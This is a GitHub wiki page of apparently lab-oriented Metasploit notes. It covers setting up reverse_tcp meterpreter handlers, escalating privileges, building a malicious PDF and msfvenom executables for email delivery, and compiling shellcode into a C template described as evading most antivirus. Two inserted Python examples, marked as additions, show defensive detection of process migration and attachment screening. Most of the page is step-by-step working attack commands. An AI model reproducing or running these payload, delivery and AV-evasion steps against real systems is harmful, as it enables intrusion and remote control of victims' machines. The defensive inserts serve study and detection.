Metasploit - jonatello/lab-musing GitHub Wiki
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/
Install Metasploit
pkg install metasploit
Install PostgreSQL
pkg install postgresql95-server
Set postgresql to automatically start, initialize the database, and start the service
sysrc postgresql_enable=yes
mkdir /usr/local/pgsql/data
chown pgsql /usr/local/pgsql/data
service postgresql initdb
service postgresql start
Create the postgresql "msf_user" user and "msf_database" database
createuser msf_user -U pgsql -P
createdb msf_database -U pgsql
Launch the Metasploit Framework Console and connect to the database
msfconsole
db_connect msf_user@localhost:5432/msf_database
Verify the connection
db_status
Most activity involves creating a payload with msfvenom and then starting a listener (handler) in Metasploit for the "victim" device to connect back to when the payload is executed. The payload itself embeds the host and port it will connect to.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 0.0.0.0
To automatically migrate each session into a new process as soon as it is established (this hides the CMD prompt and opens a notepad.exe process instead)
set AutoRunScript post/windows/manage/migrate
Finally, start the handler
exploit
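From the defender's side, the handler configuration above leaves two recognisable traces on the compromised host: an outbound connection to the handler's LHOST/LPORT, and (with the migrate AutoRunScript) that same connection re-appearing from a process such as notepad.exe that was spawned by the original payload. The following is an added example, not part of the wiki page, showing how those traces can be correlated in process-create and network-connect telemetry. The event field names (`pid`, `parent_pid`, `image`, `dst_ip`, `dst_port`) are assumptions modelled loosely on Sysmon-style records, and the sample events are constructed, not captured data.

```python
"""Correlate process-create and network-connect telemetry for the patterns a
reverse_tcp handler with automatic process migration produces.

Added example for this wiki page; not Metasploit code. Event schema and the
sample telemetry below are constructed (assumption), not a real product's.
"""
from collections import defaultdict

# Windows utilities that have no legitimate reason to open outbound TCP
# connections. notepad.exe is the migration target the page describes; the
# other entries are illustrative additions (assumption).
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe"}

# Metasploit's default handler port, as used throughout this page. The port is
# configurable, so a hit on its own is only a weak indicator.
DEFAULT_HANDLER_PORT = 4444

# Rules that justify a high-severity alert on their own.
HIGH_RULES = {"no_network_image", "callback_reused_by_child"}

# Constructed sample telemetry (not real data). Addresses use the page's lab
# handler IP and RFC 5737 documentation ranges.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 4120, "parent_pid": 1000, "image": "cmd.exe"},
    {"type": "process_create", "pid": 4133, "parent_pid": 4120, "image": "payload.exe"},
    {"type": "network_connect", "pid": 4133, "image": "payload.exe",
     "dst_ip": "10.1.1.10", "dst_port": 4444},
    # post/windows/manage/migrate spawns notepad.exe and moves the session into it
    {"type": "process_create", "pid": 4140, "parent_pid": 4133, "image": "notepad.exe"},
    {"type": "network_connect", "pid": 4140, "image": "notepad.exe",
     "dst_ip": "10.1.1.10", "dst_port": 4444},
    # Benign browser traffic, should not alert
    {"type": "network_connect", "pid": 2201, "image": "chrome.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
    # Port-only hit from a mail client: weak indicator, low severity
    {"type": "network_connect", "pid": 3010, "image": "outlook.exe",
     "dst_ip": "203.0.113.20", "dst_port": 4444},
]


def detect(events):
    """Return (rule, pid, image, detail) tuples for every rule each event trips.

    Events are processed in order so a child's connection can be matched
    against destinations its parent connected to earlier.
    """
    parent_of = {}                   # pid -> parent pid, from process_create
    destinations = defaultdict(set)  # pid -> {(dst_ip, dst_port)} seen so far
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            parent_of[ev["pid"]] = ev["parent_pid"]
            continue
        if ev["type"] != "network_connect":
            continue
        pid, image = ev["pid"], ev["image"].lower()
        dest = (ev["dst_ip"], ev["dst_port"])
        where = f"outbound to {dest[0]}:{dest[1]}"
        if image in NO_NETWORK_IMAGES:
            alerts.append(("no_network_image", pid, image, where))
        if dest[1] == DEFAULT_HANDLER_PORT:
            alerts.append(("default_handler_port", pid, image, where))
        parent = parent_of.get(pid)
        if parent is not None and dest in destinations[parent]:
            # The same callback destination moved from parent to child: the
            # behaviour process migration produces.
            alerts.append(("callback_reused_by_child", pid, image,
                           f"parent pid {parent} already connected to {dest[0]}:{dest[1]}"))
        destinations[pid].add(dest)
    return alerts


def severity_by_pid(alerts):
    """Collapse alerts to one severity per process: high if any HIGH_RULES fired."""
    result = {}
    for rule, pid, _image, _detail in alerts:
        if rule in HIGH_RULES:
            result[pid] = "high"
        else:
            result.setdefault(pid, "low")
    return result


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule, pid, image, detail in found:
        print(f"{rule:26} pid={pid:<5} {image:12} {detail}")
    print(severity_by_pid(found))
```

Running this over the constructed events produces a low-severity, port-only alert for `payload.exe` and `outlook.exe`, and a high-severity alert for `notepad.exe`, which both has no business talking to the network and re-uses the destination its parent connected to. The correlation rule is the one worth keeping: it does not depend on the port, which the page itself notes is freely configurable.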
Once a meterpreter session has been established, post-exploitation modules can be used (https://www.offensive-security.com/metasploit-unleashed/post-module-reference/)
Generally you'll want to escalate privileges if possible (if within the meterpreter shell, simply run "getsystem")
sessions -i 1 -C getsystem
If this fails, you'll need to go through the exercise of privilege escalation. Most of these exploits can be found within "exploit/windows/local/". To help find relevant exploits, use the Local Exploit Suggester, nicknamed Lester (again, if within the meterpreter shell, simply run the actual command)
sessions -i 1 -C run post/multi/recon/local_exploit_suggester
Once an exploit is identified, we can attempt to use it. For example, you can run the following within msfconsole (not meterpreter) to attempt the additional exploit on the session (we'll assume session 1)
use exploit/windows/local/ask
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
Launch the Metasploit Framework Console
msfconsole
Generate a payload with the LHOST and LPORT variables specifying the IP and port our host will be listening on. The host IP can be a private or public IP address, just keep in mind that if it's public, firewall rules and address translation will need to be accounted for. Replace the IP address and port appropriately.
use exploit/windows/fileformat/adobe_utilprintf
set FILENAME Bad_PDF.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.1.1.10
set LPORT 4444
Verify the options we've set
show options
Generate the actual payload/file
exploit
Now, we set up the multi handler listener. We will use the same LHOST and LPORT parameters to match our payload.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.1.1.10
set LPORT 4444
exploit
Now that our payload has been created and our listener is active, we need to deliver the payload and (hope) it gets executed. One method is to send an email with the payload as an attachment. There are many ways to get this done.
This time we'll use msfvenom to generate our Windows payload using the same host/port as in our previous example. The "-f" flag specifies the output format (exe), the "-e" flag specifies the encoder, and the "-o" flag specifies the output file (here, payload.exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.10 LPORT=4444 -f exe -e x86/shikata_ga_nai -o payload.exe
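The delivery method the page describes for both the generated PDF and the msfvenom executable is an e-mail attachment. The following is an added example, not part of the wiki page, of the attachment checks a mail gateway would apply to that delivery path: detect executable content from the PE header regardless of the file name, reject blocked extensions, catch double extensions, and flag a declared type that does not match the bytes. The extension lists and the `build_fake_pe()` stand-in (a header-only byte string, not a runnable program) are constructed for the example.

```python
"""Attachment checks for the e-mail delivery path described on this page.

Added example; not Metasploit code. The blocklists, the expected-type table
and all sample attachments are constructed (assumption).
"""
import struct

EXECUTABLE_EXTENSIONS = {"exe", "dll", "scr", "com"}      # gateway blocklist
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}
EXPECTED_KIND = {"pdf": "pdf", "exe": "pe", "dll": "pe", "scr": "pe"}


def looks_like_pe(data):
    """True if data carries a DOS 'MZ' stub whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def detected_type(data):
    """Classify by content, not by name: 'pe', 'pdf' or 'unknown'."""
    if looks_like_pe(data):
        return "pe"
    if data.startswith(b"%PDF-"):
        return "pdf"
    return "unknown"


def inspect_attachment(name, data):
    """Return a list of human-readable findings; an empty list means no concern."""
    findings = []
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    kind = detected_type(data)
    if kind == "pe":
        findings.append("executable content (PE header)")
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append(f"blocked extension .{ext}")
    # invoice.pdf.exe: a document extension immediately before the real one
    if len(parts) > 2 and parts[-2] in DOCUMENT_EXTENSIONS:
        findings.append(f"double extension (.{parts[-2]}.{ext})")
    expected = EXPECTED_KIND.get(ext)
    if expected is not None and kind != expected:
        findings.append(f"extension/content mismatch (.{ext} but content is {kind})")
    return findings


def scan_message(attachments):
    """Map each attachment name to its findings."""
    return {name: inspect_attachment(name, data) for name, data in attachments}


def verdict(results):
    """'quarantine' if any attachment produced a finding, else 'deliver'."""
    return "quarantine" if any(results.values()) else "deliver"


def build_fake_pe():
    """Constructed stand-in for a PE file: 'MZ' stub with e_lfanew -> 'PE\\0\\0'.

    Header bytes only; this is not a program and does nothing if executed.
    """
    header = bytearray(0x100)
    header[0:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x80)
    header[0x80:0x84] = b"PE\0\0"
    return bytes(header)


# Constructed sample attachments (not real files).
SAMPLE_ATTACHMENTS = [
    ("payload.exe", build_fake_pe()),
    ("Bad_PDF.pdf", b"%PDF-1.4\n% constructed placeholder, no objects\n"),
    ("quarterly_report.pdf", build_fake_pe()),
    ("invoice.pdf.exe", build_fake_pe()),
    ("notes.txt", b"plain text, nothing to see"),
]

if __name__ == "__main__":
    results = scan_message(SAMPLE_ATTACHMENTS)
    for name, findings in results.items():
        print(f"{name:22} {findings or 'ok'}")
    print("verdict:", verdict(results))
```

Note what this does and does not catch: the renamed and double-extension executables are flagged from their bytes, but a file such as Bad_PDF.pdf passes because it really is a PDF. The fileformat exploit the page describes needs content inspection of the PDF itself, which a magic-number check cannot provide.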
Generate the shellcode in raw C format
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IPAddress> LPORT=4444 -f c > shell_code.c 2>&1
Cat this file and note the "Payload size" value in bytes as well as the "unsigned char buf[] =" value
Create a new file (we'll call it payload.c), fill it with the content of template.metasploit, then replace the quoted string in 'unsigned const char payload[] = ""' with the previously noted payload and change 'size_t size = 0' to the noted payload size in bytes
From a Windows workstation, copy this file down locally
Download and install MinGW in order to compile the code. Once installed, select all of the packages on the "Basic Setup" tab on the left and "Mark for Installation". Next click Installation > Apply Changes > Apply to install these packages.
Edit C:\MinGW\msys\1.0\etc\fstab and verify that the line "C:\MinGW /mingw" exists
Open a CMD prompt as admin and run the following (assuming we've moved the payload.c file to C:\temp)
cd C:\MinGW\bin
gcc.exe c:\temp\payload.c -o c:\temp\payload.exe
This new payload.exe file can now be used with a handler and should avoid most AV detection.